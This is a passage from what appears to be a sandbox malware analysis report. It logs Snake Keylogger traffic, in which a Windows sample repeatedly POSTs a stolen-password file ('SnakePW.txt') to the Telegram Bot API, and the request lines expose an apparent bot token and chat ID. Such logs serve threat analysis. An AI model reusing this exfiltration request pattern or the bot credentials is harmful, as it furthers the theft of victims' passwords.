                            2022-06-26 07:34:22 UTC407OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 32 30 39 34 62 36 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da575712094b6bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:22 UTC407INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:22 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:22 UTC408INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 32 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 36 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":67022,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228862,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            242192.168.2.550153149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:22 UTC408OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5757124748d1
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:22 UTC408OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 32 34 37 34 38 64 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5757124748d1Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:22 UTC409INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:22 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:22 UTC409INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 32 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 36 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":67023,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228862,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            243192.168.2.550154149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:22 UTC410OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da575712854476
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:22 UTC410OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 32 38 35 34 34 37 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da575712854476Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:23 UTC411INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:23 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:23 UTC411INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 32 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 36 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":67024,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228863,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            244192.168.2.550155149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:23 UTC412OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da575712c806a4
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:23 UTC412OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 32 63 38 30 36 61 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da575712c806a4Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:23 UTC412INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:23 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:23 UTC413INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 32 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 36 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":67025,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228863,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            245192.168.2.550156149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:23 UTC413OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5757130d2b62
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:23 UTC414OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 33 30 64 32 62 36 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5757130d2b62Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:24 UTC414INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:24 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:24 UTC414INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 32 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 36 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":67027,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228863,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            246192.168.2.550158149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:24 UTC415OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da575713524e97
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:24 UTC415OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 33 35 32 34 65 39 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da575713524e97Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:24 UTC416INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:24 GMT
                            Content-Type: application/json
                            Content-Length: 509
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:24 UTC416INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 32 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 36 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":67028,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228864,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            247192.168.2.550159149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:24 UTC417OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5757139e9a3d
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:24 UTC417OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 33 39 65 39 61 33 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5757139e9a3dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:24 UTC417INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:24 GMT
                            Content-Type: application/json
                            Content-Length: 509
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:24 UTC418INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 32 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 36 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":67029,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228864,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            248192.168.2.550160149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:25 UTC418OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da575713dc96af
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:25 UTC419OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 33 64 63 39 36 61 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da575713dc96afContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:25 UTC419INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
